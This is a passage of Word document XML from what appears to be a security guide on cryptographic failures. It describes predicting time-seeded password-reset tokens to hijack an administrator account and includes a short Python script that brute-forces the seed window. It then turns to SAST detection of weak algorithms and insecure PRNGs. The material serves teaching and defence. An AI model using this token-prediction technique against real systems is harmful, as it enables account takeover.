          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The attacker sends requests to the password completion endpoint using the predicted tokens. When the script hits the exact millisecond seed used by the server, the system validates the token as a match. The attacker successfully resets the administrator's password and hijacks the account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2BAFF3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Payload Generation (Brute-Forcing the Time Seed):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Because standard PRNGs are deterministic once the seed is known, the attacker writes a script to simulate the PRNG output for the narrow window of milliseconds surrounding the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D09CAE6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Sample Local Script Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB9E0A6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>import random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EC2D54" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># Attacker narrows down the exact millisecond the server processed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1393AE15" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>the admin request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238A28CF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>approximate_server_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 1783244889000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064C4420" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># Generate the pool of possible tokens for that specific time window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE3892" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>seed_guess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inrange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>approximate_server_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 500,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062D14AE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>approximate_server_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 500):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7F104F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>random.seed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>seed_guess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A169E9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>predicted_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = hex(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>random.getrandbits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(64))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1668E6DD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>f"Testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> predicted token: {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>predicted_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516D703F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Discovery &amp; Identification (How to Find It)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E77F10F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Automated Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A67B3EE"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Automated tools are highly effective at scaling the discovery of cryptographic failures, though their detection capabilities vary significantly depending on whether they analyze static source code or running applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476E5F18" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Static Application Security Testing (SAST):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> SAST tools excel at finding cryptographic flaws because they have direct visibility into libraries, configurations, and source code logic. They scan the codebase looking for specific signatures, abstract syntax tree (AST) patterns, and data flows, flagged by anomalies such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7042E6F2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Banned Functions/Algorithms:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Matches against deprecated cryptographic APIs (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>SHA1</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>DES</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>RC4</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A2B9D7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Insecure PRNGs:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use of non-cryptographic random utilities (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>java.util.Random</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>rand()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
